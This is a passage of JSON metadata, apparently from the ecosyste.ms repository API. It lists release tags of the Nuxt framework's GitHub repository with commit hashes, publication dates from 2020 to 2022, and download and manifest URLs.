kg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt